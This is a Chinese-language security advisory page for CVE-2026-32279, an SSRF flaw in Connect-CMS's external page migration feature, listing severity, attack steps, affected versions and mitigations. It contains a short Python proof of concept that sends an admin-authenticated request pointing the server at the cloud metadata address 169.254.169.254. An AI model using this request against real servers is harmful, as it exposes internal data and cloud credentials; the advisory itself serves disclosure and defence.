IPBUF安全漏洞报告
English
CVE-2026-32279 CVSS 6.8 中危

CVE-2026-32279 Connect-CMS服务端请求伪造漏洞

披露日期: 2026-03-23

漏洞信息

漏洞编号
CVE-2026-32279
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
6.8 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Connect-CMS

相关标签

SSRFConnect-CMS服务端请求伪造CVE-2026-32279

漏洞概述

Connect-CMS在1.x(至1.41.0)和2.x(至2.41.0)版本的页面管理插件外部页面迁移功能中存在SSRF漏洞。高权限用户可利用该漏洞诱导服务器向内网发起请求,从而读取敏感信息。官方已在1.41.1和2.41.1版本中修复此问题。

技术细节

该漏洞位于Connect-CMS的页面管理插件中,具体是“外部页面迁移”功能。由于系统未对用户输入的URL地址进行有效范围限制,拥有高权限(PR:H)的认证攻击者可以构造包含内网IP地址(如127.0.0.1或169.254.169.254)的恶意请求。当服务器处理该迁移请求时,会向攻击者指定的内网地址发送HTTP请求,导致SSRF。攻击者利用此特性可扫描内网端口、访问云元数据服务或读取本地受限文件,且由于S:C(范围改变),可能影响同一信任域内的其他系统。

攻击链分析

STEP 1
步骤1:获取权限
攻击者需要获取Connect-CMS的高权限账户(如管理员权限),以访问页面管理插件的功能。
STEP 2
步骤2:构造恶意请求
攻击者在外部页面迁移功能中,输入指向内网敏感资源(如云元数据服务或内网管理后台)的恶意URL。
STEP 3
步骤3:触发SSRF
服务器端解析该请求并向内网目标发起连接,返回敏感信息给攻击者,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# POC for CVE-2026-32279 (Conceptual) # This script demonstrates how an attacker might trigger the SSRF # by sending a crafted request to the migration endpoint. import requests target_url = "http://target-cms.com/admin/page/migrate" # Attacker controlled URL pointing to internal metadata service malicious_url = "http://169.254.169.254/latest/meta-data/" # Authentication is required (PR:H), assuming session cookie is obtained cookies = { "SESSIONID": "stolen_admin_session_id" } payload = { "url": malicious_url, "action": "import" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("Request sent successfully. Check response for SSRF indication.") print(response.text[:200]) except Exception as e: print(f"Error: {e}")

影响范围

Connect-CMS 1.x <= 1.41.0
Connect-CMS 2.x <= 2.41.0

防御指南

临时缓解措施
建议暂时禁用页面管理插件中的外部页面迁移功能,或通过WAF等安全设备拦截针对该接口的异常请求,严格限制仅允许可信的外部域名进行迁移。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表